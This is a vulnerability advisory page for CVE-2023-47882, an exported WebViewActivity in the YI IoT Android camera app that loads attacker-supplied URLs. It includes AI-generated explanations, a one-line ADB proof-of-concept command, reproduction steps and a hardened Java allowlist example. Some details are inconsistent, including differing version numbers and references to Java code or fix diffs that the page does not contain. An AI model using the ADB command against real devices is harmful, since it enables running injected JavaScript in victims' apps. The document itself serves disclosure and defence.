VYPR
Unrated severity · NVD Advisory · Published Dec 27, 2023 · Updated Aug 2, 2024

CVE-2023-47882

Description

The YI IoT Android app's WebViewActivity is exported and accepts implicit intents, allowing a remote attacker to execute arbitrary JavaScript via a malicious URL.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

The YI IoT Android application `com.yunyi.smartcamera` up to version 4.1.9_20231127 contains a vulnerability in the `com.ants360.yicamera.activity.WebViewActivity` component. This activity is marked as exported and accepts an implicit Intent, allowing any third-party application to invoke it without permissions. An attacker can supply a URL via the `path` extra, which the WebView loads, enabling arbitrary JavaScript execution [1][2].

Exploitation

An attacker can exploit this by crafting an implicit Intent with a `path` extra pointing to a malicious URL. This can be done via an ADB command or through a malicious app installed on the same device. For example, using ADB: `adb shell am start -n com.yunyi.smartcamera/com.ants360.yicamera.activity.WebViewActivity -e path "https://www.example.com/maliciousContent"` [2]. The WebView then loads the URL and executes the JavaScript in the context of the vulnerable application.

Impact

Successful exploitation allows remote JavaScript execution within the YI IoT app's WebView. This could lead to unauthorized access to sensitive data, theft of user information, or manipulation of app functionality, all without requiring any special permissions [2].

Mitigation

As a mitigation, the android:exported attribute of the WebViewActivity should be set to false to prevent external access. As of the publication date, no official patch has been released in the available references [2].

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Kami Vision/Kami Vision YI IoT
  • Range: <=4.1.9_20231127

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The WebViewActivity is exported and accepts an implicit Intent without validating the supplied URL, allowing arbitrary remote JavaScript to be loaded."

Attack vector

An attacker installs a malicious third-party application on the same Android device, which sends an implicit Intent to the exported `WebViewActivity` with a `path` extra containing a URL to attacker-controlled JavaScript content [ref_id=1]. The WebView loads the supplied URL, executing arbitrary JavaScript in the context of the YI IoT application [ref_id=1]. No permissions are required to trigger the vulnerability [ref_id=1].

Affected code

The vulnerable component is `com.ants360.yicamera.activity.WebViewActivity` in the `com.yunyi.smartcamera` package (YI IoT app up to version 4.1.9_20231127) [ref_id=1]. This activity is marked as exported and accepts an implicit Intent, allowing any third-party application to invoke it [ref_id=1].

What the fix does

The advisory recommends setting `android:exported` to `false` for `WebViewActivity` if external access is not intended, or validating the incoming URL against an allowlist [ref_id=1]. No official patch has been published by the vendor as of the advisory date [ref_id=1].
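
One way to implement the allowlist check described above, as an added example that is not code from the YI IoT app or the advisory. `SafeWebViewActivity`, the `com.example.hardened` package and the two allowed hosts are hypothetical; only the `path` extra name comes from this page.

```java
// Added example: hypothetical activity, not the YI IoT app's code.
// Manifest side of the fix: android:exported="false" on this <activity>.
package com.example.hardened; // hypothetical package

import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebView;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

public class SafeWebViewActivity extends Activity {
    // Hypothetical allowlist; a real app lists only hosts it controls.
    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("help.example.com", "shop.example.com"));

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // "path" is the extra name given in the advisory text.
        String raw = getIntent().getStringExtra("path");
        Uri uri = (raw == null) ? null : Uri.parse(raw);
        if (!isAllowed(uri)) {
            finish(); // refuse to load a URL that fails validation
            return;
        }
        WebView webView = new WebView(this);
        // JavaScript is off by default in WebView; enable it only if these pages need it.
        webView.getSettings().setJavaScriptEnabled(false);
        setContentView(webView);
        webView.loadUrl(uri.toString());
    }

    // Exact match on scheme and host; no prefix or substring checks.
    static boolean isAllowed(Uri uri) {
        if (uri == null || !uri.isHierarchical()) return false;
        if (!"https".equalsIgnoreCase(uri.getScheme())) return false; // rejects file:, javascript:, http:
        if (uri.getUserInfo() != null) return false; // rejects URLs carrying a user-info part before the host
        String host = uri.getHost();
        return host != null && ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }
}
```

The check covers only the initial URL; applying the same `isAllowed` test in a `WebViewClient.shouldOverrideUrlLoading` override extends it to later navigations.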

Preconditions

  • input: The attacker must have a malicious third-party application installed on the same Android device as the vulnerable YI IoT app.
  • config: The YI IoT app must be version 4.1.9_20231127 or earlier.
  • auth: No permissions are required; the WebViewActivity is exported and accepts implicit intents.

Reproduction

1. Install the YI IoT app (version 4.1.7_20231026 or earlier) on an Android device [ref_id=1].
2. Execute the ADB command: `adb shell am start -n com.yunyi.smartcamera/com.ants360.yicamera.activity.WebViewActivity -e path "https://www.example.com/maliciousContent"` [ref_id=1].
3. Alternatively, run the provided Java code from a third-party Android app to invoke the WebViewActivity with a malicious URL [ref_id=1].

Generated on May 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2
